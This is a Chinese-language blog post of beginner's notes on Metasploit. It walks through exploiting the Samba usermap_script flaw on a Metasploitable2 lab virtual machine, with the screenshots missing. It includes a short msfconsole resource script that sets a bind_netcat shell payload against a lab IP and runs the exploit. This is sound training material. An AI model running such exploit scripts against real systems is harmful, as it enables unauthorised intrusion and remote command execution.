[渗透测试]metasploit学习笔记——简单使用（一）

最近想找一个渗透测试的项目做，因此想学习一下metasploit的使用。
metasploit是一个强大的渗透测试工具，受到广大安全爱好者的喜欢。
接下来，我将记录下--我根据<<Metasploit渗透测试魔鬼训练营>>这本书，学习和使用metasploit进行渗透测试的过程。

对metasploitable2渗透测试

1.先去官网下载metasploitable2镜像，将其部署在vmware虚拟机上面，并启动。默认的登录账户和密码都是msfadmin
2.启动kali虚拟机，在终端下输入msfconsole就可以启动msf终端了
3.使用samba漏洞对metasploitable2的测试流程：

启动&查找(search) Samba漏洞的exploit

Paste_Image.png

use exploit& show payloads

Paste_Image.png

set payload & show options & set RHOST

im

最后输入exploit就会执行之前设置好的exploit，之后利用成功之后会显示生成一个shell，就可以执行命令了
(注：跟一般的终端不一样，没有前缀，想看是否利用成功，可以输入命令试试看是否返回结果，我输入的ls -l)

Paste_Image.png

tips:
1.输入umane -a可以查看机器的系统信息。

那么，怎么实现一个自动化的脚本来利用msf去渗透呢？可以这么做

• 先查看一些msfconsole的帮助命令：

Paste_Image.png

• 发现可以用msfconsole -r file来执行一个脚本，因此先创建一个文件hello.msf，内容为

use multi/samba/usermap_script
set payload cmd/unix/bind_netcat
set RHOST 192.168.150.132
exploit

• 然后输入msfconsole -r hello.msf，执行成功后如下图：

Paste_Image.png Paste_Image.png